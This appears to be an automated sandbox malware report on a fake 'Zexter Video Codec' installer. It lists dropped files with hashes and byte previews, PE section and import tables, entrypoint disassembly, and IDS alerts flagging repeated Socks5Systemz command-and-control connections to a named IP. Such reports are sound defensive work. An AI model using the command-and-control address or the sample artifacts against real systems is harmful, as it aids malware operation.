                                                                                                    SHA-512:F9E834F68ADCB2729ADF97AD96CBA376E9639D0348C326A0375B32623BBB5C08C782C5DFCC3505889179E6F9193AF0B8B6508F57D34CCD2F027C7E9A56FC077C
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\unins000.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:InnoSetup Log Zexter Video Codec, version 0x30, 10058 bytes, 571345\user, "C:\Users\user\AppData\Local\Zexter Video Codec"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10058
                                                                                                    Entropy (8bit):5.007604284705348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dShWMdNpxUSZb9J+eOIhnn/VJKsFc8VyPEui4a:4hWMDpxUCSHIh/VJlFcWyPziV
                                                                                                    MD5:C881A2F9AC65D4CF870461DEB70EE31F
                                                                                                    SHA1:A9BB5E469627204C3A41631247A0F4B2176A86C0
                                                                                                    SHA-256:CCB0FF68881B65BF0B1A9FAF011E007EE3856BCD3673B2CFABCEBC366AF97EBA
                                                                                                    SHA-512:4BC33A5AFEBDE290810273AF289C78552431F2130CF490E6341B5EDBFE2D302510DD2D738B1AAE541FF0644611BAE150E1A4BA323198BBEF22D92BAD4DEF059E
                                                                                                    Malicious:false
                                                                                                    Preview:Inno Setup Uninstall Log (b)....................................Zexter Video Codec..............................................................................................................Zexter Video Codec..............................................................................................................0...N...J'..%....................................................................................................................................Q....571345.user0C:\Users\user\AppData\Local\Zexter Video Codec...........'...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\unins000.exe (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720373
                                                                                                    Entropy (8bit):6.507155477779126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFZ:nu7eEYCP8trP837szHUA60SLtcV3E9k9
                                                                                                    MD5:74DE04C1DA3B854F12AE2E6C63AACF1D
                                                                                                    SHA1:18B6BEA4B7F04DF51BA3FCE01FDCB2A016714EB1
                                                                                                    SHA-256:CEB3C30CD6ED1CA29EE3A058D953BF2C7FE3B31452B4B8DD219D06D4138310E5
                                                                                                    SHA-512:F9E834F68ADCB2729ADF97AD96CBA376E9639D0348C326A0375B32623BBB5C08C782C5DFCC3505889179E6F9193AF0B8B6508F57D34CCD2F027C7E9A56FC077C
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):2586624
                                                                                                    Entropy (8bit):6.983193640665711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:v7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:v7mpKgNdZRknYg3Fo8OqmUWz28g
                                                                                                    MD5:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    SHA1:A8E99F68A9DEA6F3C0A0767C4341716236D366E9
                                                                                                    SHA-256:A241C183E38754017F08936A0C6E71588EACAFC44C656110C071032F5B6FD159
                                                                                                    SHA-512:BA22F267944CB8FCB8729E99E62DB7EF27EAF38C2C613CD6C4106250EAABEC4546B387F465330410B006535B4DD9226FBDA12C22D6EC29795FC296C82E9C52A8
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...`W.L..................".........(."......."...@...........................'......3(......................................."......p#..`............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8d....#..0....".............@....rsrc....b...p#..b....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\zlib1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98626
                                                                                                    Entropy (8bit):6.478068795827396
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                                                    MD5:70CA53E8B46464CCF956D157501D367A
                                                                                                    SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                                                    SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                                                    SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.999573861042952
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    File name:L9rm7AX4mp.exe
                                                                                                    File size:8'333'974 bytes
                                                                                                    MD5:0396163369529cd5b010e3c35a2066c5
                                                                                                    SHA1:c3f58efd6dc957d0baf6eb71e0f6539e5eb3d596
                                                                                                    SHA256:31d2bac123d451caed79ced03b80592dacc3499f6c91a9e32630d3590d52a6c0
                                                                                                    SHA512:6805f80c0979432ff1e3adfed34fd8a30d8a79b839796dc94329b409892e4a5809df9728158dc782c78417badabbf20a058949814b37fc4f99a53c293d68e968
                                                                                                    SSDEEP:196608:dhd3YhVbbGfzH8dFXKH3ARHMjDB5braO5F5KMA7z0fCnIRBR:dnYTbuzH8dFaHfjVxronSCIPR
                                                                                                    TLSH:D386338E75D09514F082CB3CA93C750D54A0339929BB63337A5E2A9D3EA3B93442EF57
                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                    File Icon

                                                                                                    Icon Hash:2d2e3797b32b2b99

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x409c40
                                                                                                    Entrypoint Section:CODE
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:1
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:1
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:1
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    add esp, FFFFFFC4h
                                                                                                    push ebx
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    xor eax, eax
                                                                                                    mov dword ptr [ebp-10h], eax
                                                                                                    mov dword ptr [ebp-24h], eax
                                                                                                    call 00007F8B60F2589Bh
                                                                                                    call 00007F8B60F26AA2h
                                                                                                    call 00007F8B60F26D31h
                                                                                                    call 00007F8B60F28D68h
                                                                                                    call 00007F8B60F28DAFh
                                                                                                    call 00007F8B60F2B6DEh
                                                                                                    call 00007F8B60F2B845h
                                                                                                    xor eax, eax
                                                                                                    push ebp
                                                                                                    push 0040A2FCh
                                                                                                    push dword ptr fs:[eax]
                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                    xor edx, edx
                                                                                                    push ebp
                                                                                                    push 0040A2C5h
                                                                                                    push dword ptr fs:[edx]
                                                                                                    mov dword ptr fs:[edx], esp
                                                                                                    mov eax, dword ptr [0040C014h]
                                                                                                    call 00007F8B60F2C2ABh
                                                                                                    call 00007F8B60F2BEDEh
                                                                                                    lea edx, dword ptr [ebp-10h]
                                                                                                    xor eax, eax
                                                                                                    call 00007F8B60F29398h
                                                                                                    mov edx, dword ptr [ebp-10h]
                                                                                                    mov eax, 0040CE24h
                                                                                                    call 00007F8B60F25947h
                                                                                                    push 00000002h
                                                                                                    push 00000000h
                                                                                                    push 00000001h
                                                                                                    mov ecx, dword ptr [0040CE24h]
                                                                                                    mov dl, 01h
                                                                                                    mov eax, 0040738Ch
                                                                                                    call 00007F8B60F29C27h
                                                                                                    mov dword ptr [0040CE28h], eax
                                                                                                    xor edx, edx
                                                                                                    push ebp
                                                                                                    push 0040A27Dh
                                                                                                    push dword ptr fs:[edx]
                                                                                                    mov dword ptr fs:[edx], esp
                                                                                                    call 00007F8B60F2C31Bh
                                                                                                    mov dword ptr [0040CE30h], eax
                                                                                                    mov eax, dword ptr [0040CE30h]
                                                                                                    cmp dword ptr [eax+0Ch], 01h
                                                                                                    jne 00007F8B60F2C45Ah
                                                                                                    mov eax, dword ptr [0040CE30h]
                                                                                                    mov edx, 00000028h
                                                                                                    call 00007F8B60F2A028h
                                                                                                    mov edx, dword ptr [00000030h]

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x110000x2c000x2c00697c7e8eb3d0a669042c65dab0304fffFalse0.3230646306818182data4.46301877582219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                    RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                    RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                    RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                    RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                    RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                    RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                    RT_STRING0x12e440x68data0.75
                                                                                                    RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                    RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                    RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                                                    RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                    RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2764900662251656
                                                                                                    RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                    user32.dllMessageBoxA
                                                                                                    oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                    kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                    user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                    comctl32.dllInitCommonControls
                                                                                                    advapi32.dllAdjustTokenPrivileges

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    DutchNetherlands
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-03T08:39:57.996325+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549711185.208.158.24880TCP
                                                                                                    2024-10-03T08:39:58.879562+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549712185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:01.788816+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549712185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:02.620011+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549715185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:03.096771+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549715185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:03.912593+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549717185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:04.832385+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549718185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:05.669677+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549719185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:06.018610+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549719185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:06.831497+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549720185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:08.481850+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549721185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:08.830452+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549721185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:09.645985+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549722185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:10.454749+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549723185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:11.275120+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:11.624286+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:11.967613+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:12.328222+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:13.668706+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549725185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:14.019252+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549725185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:14.838729+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549726185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:15.663948+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549727185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:16.468813+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549728185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:17.286665+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549729185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:18.088017+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549730185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:18.439019+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549730185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:19.251332+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549731185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:20.057528+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549732185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:20.409920+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549732185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:21.226324+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549733185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:22.025545+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549734185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:22.376751+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549734185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:23.198191+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:23.546290+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:23.890737+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:24.748977+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549736185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:25.095004+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549736185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:25.951345+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:26.309689+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:26.660761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:27.473539+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:28.281045+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549739185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:29.573724+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:29.920486+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:30.274094+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:31.086834+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549741185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:31.954102+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549742185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:32.796761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549743185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:33.609989+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549744185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:34.425353+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549745185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:35.274022+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549746185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:36.073350+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549747185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:36.429599+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549747185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:37.238142+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549748185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:38.061539+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:38.412198+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:39.225451+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549750185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.026491+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.389709+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.732228+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:41.558714+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549752185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:41.908031+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549752185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:42.893022+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549753185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:43.713226+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549754185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:44.063249+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549754185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:44.974334+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549755185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:46.182575+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549756185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:46.530399+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549756185.208.158.24880TCP
